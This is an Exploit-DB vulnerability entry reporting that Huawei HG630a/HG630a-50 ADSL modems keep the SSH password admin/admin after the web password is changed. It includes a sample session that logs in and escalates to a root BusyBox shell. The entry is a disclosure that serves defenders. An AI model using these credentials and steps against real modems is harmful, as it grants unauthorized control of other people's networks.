Huawei HG630a / HG630a-50 - Default SSH Admin Password on ADSL Modems

EDB-ID:

38663

CVE:


EDB Verified:

Author:

Murat Sahin

Type:

remote

Exploit:   /  

Platform:

Hardware

Date:

2015-11-10

Vulnerable App: 
# Exploit Title: Huawei HG630a and HG630a-50 Default SSH Admin Password on Adsl Modems
# Date: 10.11.2015
# Exploit Author: Murat Sahin  (@murtshn)
# Vendor Homepage: Huawei
# Version: HG630a and HG630a-50
# Tested on: linux,windows

Adsl modems force you to change admin web interface password. Even though
you can change admin password on the web interface,  the password you
assign does not apply to ssh. So, SSH password always  will be
'Username:admin Password:admin'.

Ex:

*ssh admin@modemIP <admin@192.168.1.1>*
admin@modemIP <admin@192.168.1.1>'s password:*admin*
PTY allocation request failed on channel 0
------------------------------
-
-----Welcome to ATP Cli------
-------------------------------
ATP>?
?
cls
debug
help
save
?
exit
ATP>shell
shell


BusyBox vv1.9.1 (2013-12-31 16:16:20 CST) built-in shell (ash)
Enter 'help' for a list of built-in commands.

# cat /proc/version
cat /proc/version
Linux version 2.6.30 (y00179387@localhost) (gcc version 4.4.2
(Buildroot 2010.02-git) ) #10 SMP PREEMPT Tue Dec 31 16:20:50 CST 2013
#
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services